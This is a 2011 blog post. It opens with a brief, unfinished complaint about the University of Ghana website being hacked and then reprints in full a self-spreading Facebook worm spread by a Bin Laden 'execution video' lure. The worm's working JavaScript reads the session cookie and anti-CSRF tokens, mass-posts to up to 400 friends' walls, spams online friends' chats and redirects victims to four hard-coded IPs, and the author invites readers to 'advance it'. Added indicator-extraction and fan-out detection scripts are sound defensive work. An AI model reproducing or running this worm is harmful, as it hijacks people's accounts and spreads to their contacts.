2011/05/06

University of Ghana Website hacked for 2+ years

I complained about the University of Ghana website being hacked by "someone" and having
cloaked ads inserted into its pages; well, it seems no one took notice of this.

So I am going to loud-mouth more details. Remember, this is not to disgrace or
tarnish the image of the webmaster of the University of Ghana website, but it
is to awaken the sleepy and often loud and uneducated bureaucrats in Ghana
at large. The problem with Ghana is that more and more people are beginning to see
the advantages of IT and are greedily trying to squeeze everything out of anyone
who has knowledge or skills in this field.

"Your site is hacked!" is a very scary statement, and if I approached them
I would get the "you did, huh?" question, which would piss me off and I'd probably
slap the shit out of someone; to avoid that, I can blog :)

To verify this absurd claim from moi (laudarch), do the following:

It's been a while, so I'll just share.

Facebook Worm

Hello, it's been really long and a lot of things have happened; anyway, I will tell you about those later.

What I want to talk about now is a Facebook worm I got a couple of days ago.
I received a mail from a Facebook friend and it had a very suspicious title:


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

Weird, huh? Even CNN didn't show a video, so how come this group has it?
The page has currently been removed. It's funny when these things happen
and people fall for it anyway. It had instructions to copy and paste a JavaScript
snippet into your address bar after you are logged in to Facebook.

The interesting thing about this worm is how it spreads:
it uses the "stupidity" of humans. Yes, stupidity!

My brother and I tried designing a worm on Facebook once, and we came up
with different algorithms for spreading using apps, mailing
and posting comments, and all of this could not be made automatic; I even came up
with Mozilla extensions to do the job.


The future of worms and viruses is social networking. I watched as the group
grew from 8,000 to 60,000+ in less than two hours; now that is power. Given the
intelligence of the average Joe and Jane, this would work for the next 10 to 15
years.

I copied the JavaScript code that spread from the victim's wall and profile to the
victim's friends et al.

Below is the code; learn from it, advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user"); // the victim's own Facebook user ID, taken from the session cookie


// Setup some variables
// Anti-CSRF tokens scraped from the page's own hidden form fields. Because the
// victim pasted this script into the address bar it runs in the facebook.com
// origin and can read them, so the tokens give no protection here.

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  // Facebook prefixes its JSON responses with "for (;;);" so that a cross-origin
  // <script src> include would hang instead of leaking the data; a same-origin
  // XHR simply strips the prefix before parsing.
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // Content-length and Connection are browser-controlled headers; XMLHttpRequest ignores these two calls.
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // No-op: XMLHttpRequest has no close(); this bare property access does nothing
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // No-op, as above
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
// Replace the page body with a fake "please wait" spinner while the requests above run in the background.
document.getElementById('contentArea').innerHTML="<center><img src='http://www.hindustantimes.com/images/loading_gif.gif' />Please wait...";
// Pick one of four hard-coded hosts at random and send the victim there after 15 seconds.
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see, this worm was written very well, with everything happening in the background
thanks to the power of AJAX. Note that nothing in it exploits a bug in Facebook: once the victim
pastes the script into the address bar it runs in the facebook.com origin, so it can read the
c_user session cookie, lift the anti-CSRF tokens (post_form_id, fb_dtsg) out of the page's own
hidden fields and issue the same XMLHttpRequests the real UI issues, posting to up to 400 friends'
walls and 100 online friends' chats before redirecting the victim to one of four hard-coded hosts.
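One thing an incident responder wants from a sample like this is the indicator list: which platform endpoints it abuses, which lure pages and third-party hosts it references, which bare IPs it redirects to, and which cookies and form fields it harvests from the session. The following is an added example of my own, not code from the worm or the original post. SAMPLE is a constructed excerpt of the script above, trimmed to the lines that carry indicators; the functions run on the full source just as well. Note that one host only appears form-encoded (http%3A%2F%2F...), so a decoded copy of the text is scanned too.

```javascript
// Added example, not part of the worm or the original post: pull the network
// and session indicators out of the worm source.
// SAMPLE is a constructed excerpt of the script posted above (real lines,
// trimmed to those carrying indicators); the functions work on the full text.
const SAMPLE = `
var user_id = readCookie("c_user");
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var shortArray = new Array("http://ow.ly/4LNpd", "http://clickily.ws/zyaeom");
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token;
var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
var picture="http://cooldadssz.co.cc/laden.png";
var paramswp = "post_form_id="+post_form_id+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title;
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000);
`;

// URL literals stop at quotes, whitespace or a closing bracket so that
// "...&viewer="+user_id does not swallow the string concatenation.
const URL_RE = /https?:\/\/[^\s"'<>)]+/g;
// Dotted quads; the octet range is checked separately so 999.1.1.1 is rejected.
const IPV4_RE = /\b(?:\d{1,3}\.){3}\d{1,3}\b/g;
// Names the script reads out of the victim's session: cookies and hidden form fields.
const COOKIE_RE = /readCookie\(\s*["']([^"']+)["']\s*\)/g;
const FIELD_RE = /getElementsByName\(\s*["']([^"']+)["']\s*\)/g;

const uniq = (arr) => [...new Set(arr)];

// The worm hides one host inside a form-encoded parameter (http%3A%2F%2F...),
// so a decoded copy of the source is scanned as well as the raw text.
function decodedView(src) {
  try { return decodeURIComponent(src); } catch (e) { return src; }
}

function extractUrls(src) {
  const raw = src.match(URL_RE) || [];
  const dec = decodedView(src).match(URL_RE) || [];
  return uniq([...raw, ...dec]);
}

function extractIPv4(src) {
  return uniq((src.match(IPV4_RE) || []).filter((ip) =>
    ip.split('.').every((o) => Number(o) <= 255)));
}

function extractHarvestedNames(src) {
  const names = [];
  for (const re of [COOKIE_RE, FIELD_RE]) {
    for (const m of src.matchAll(re)) names.push(m[1]);
  }
  return uniq(names);
}

// Split URLs into the platform's AJAX endpoints (the propagation channels),
// other platform pages (the lure) and third-party hosts (shorteners, payload).
function classifyUrls(urls, platformHost) {
  const ajaxEndpoints = [], platformPages = [], externalHosts = [];
  for (const raw of urls) {
    let u;
    try { u = new URL(raw); } catch (e) { continue; } // skip anything unparsable
    const onPlatform = u.hostname === platformHost || u.hostname.endsWith('.' + platformHost);
    if (!onPlatform) externalHosts.push(u.hostname);
    else if (u.pathname.startsWith('/ajax/')) ajaxEndpoints.push(u.pathname);
    else platformPages.push(u.pathname);
  }
  return {
    ajaxEndpoints: uniq(ajaxEndpoints).sort(),
    platformPages: uniq(platformPages).sort(),
    externalHosts: uniq(externalHosts).sort(),
  };
}

function analyzeWormSource(src, platformHost = 'facebook.com') {
  return {
    ...classifyUrls(extractUrls(src), platformHost),
    ipv4: extractIPv4(src),                 // bare IPs: the post-infection redirect hosts
    harvested: extractHarvestedNames(src),  // cookies/fields the script steals from the session
  };
}

console.log(JSON.stringify(analyzeWormSource(SAMPLE), null, 2));
```

The split between /ajax/ endpoints and other platform paths is what makes the output directly usable: the endpoint list is what you rate-limit or watch for bursts, the lure pages are what you take down, and the external hosts and IPs go straight onto a blocklist.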

I am going to take time to fully reverse this and add comments on how to extend it; until then I am writing something else :)
Oh, I also have to post some virii I have been reversing for some time now :)
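From the defender's side, the tell in this worm is not any single request but the fan-out: one session posting to up to 400 distinct walls and 100 distinct chat recipients within seconds. The following is an added example of my own, not code from the worm or the original post, showing that detection as a sliding window over per-user request logs. The log line format is constructed for this example; the endpoint names and the xhpc_targetid / to parameters are the ones the worm uses, while the 60-second window and the threshold of 20 distinct targets are assumptions to be tuned against real traffic.

```javascript
// Added example, not part of the worm or the original post: flag a session
// that posts to many distinct targets in a short window, the way the script
// above does. Log format is constructed; window and threshold are assumptions.
const LINE_RE = /^(\S+) user=(\d+) POST (\S+) (?:xhpc_targetid|to)=(\d+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null; // e.g. the buddy_list fetch, which names no target
  return { ts: Date.parse(m[1]), iso: m[1], user: m[2], endpoint: m[3], target: m[4] };
}

// Sliding window per (user, endpoint): count distinct targets seen within
// windowSec and fire once when that count reaches threshold.
function detectFanOut(lines, { windowSec = 60, threshold = 20 } = {}) {
  const events = lines.map(parseLine).filter(Boolean).sort((a, b) => a.ts - b.ts);
  const byKey = new Map();
  for (const e of events) {
    const key = `${e.user}|${e.endpoint}`;
    if (!byKey.has(key)) byKey.set(key, []);
    byKey.get(key).push(e);
  }
  const alerts = [];
  for (const evs of byKey.values()) {
    const inWindow = new Map(); // target -> occurrences inside the window
    let lo = 0;
    for (let hi = 0; hi < evs.length; hi++) {
      inWindow.set(evs[hi].target, (inWindow.get(evs[hi].target) || 0) + 1);
      while (evs[hi].ts - evs[lo].ts > windowSec * 1000) { // evict events that fell out of the window
        const t = evs[lo].target;
        const n = inWindow.get(t) - 1;
        if (n === 0) inWindow.delete(t); else inWindow.set(t, n);
        lo++;
      }
      if (inWindow.size >= threshold) {
        alerts.push({ user: evs[hi].user, endpoint: evs[hi].endpoint,
                      distinctTargets: inWindow.size, windowStart: evs[lo].iso, windowEnd: evs[hi].iso });
        break; // one alert per (user, endpoint) is enough
      }
    }
  }
  return alerts;
}

// Constructed log: user 1001 behaves normally; user 1002 is infected and hits
// 30 distinct walls in ten seconds, then five chat sends.
const pad = (n) => String(n).padStart(2, '0');
const LOG = [
  '2011-05-06T10:00:01Z user=1001 POST /ajax/profile/composer.php xhpc_targetid=2001',
  '2011-05-06T10:03:15Z user=1001 POST /ajax/profile/composer.php xhpc_targetid=2002',
  '2011-05-06T10:05:00Z user=1002 POST /ajax/chat/buddy_list.php',
  ...Array.from({ length: 30 }, (_, i) =>
    `2011-05-06T10:05:${pad(i % 10)}Z user=1002 POST /ajax/profile/composer.php xhpc_targetid=${3000 + i}`),
  ...Array.from({ length: 5 }, (_, i) =>
    `2011-05-06T10:05:${pad(10 + i)}Z user=1002 POST /ajax/chat/send.php to=${3000 + i}`),
];

// The same 30 posts at one per minute over half an hour: a busy but human
// pace that must not alert.
const SLOW_LOG = Array.from({ length: 30 }, (_, i) =>
  `2011-05-06T10:${pad(i)}:00Z user=1003 POST /ajax/profile/composer.php xhpc_targetid=${4000 + i}`);

console.log(detectFanOut(LOG));
```

Keying on (user, endpoint) rather than user alone keeps the wall-post and chat channels separate, so a heavy chat user does not push the wall-post count over the line; the distinct-target count, rather than a raw request count, is what separates this worm from someone repeatedly editing one post.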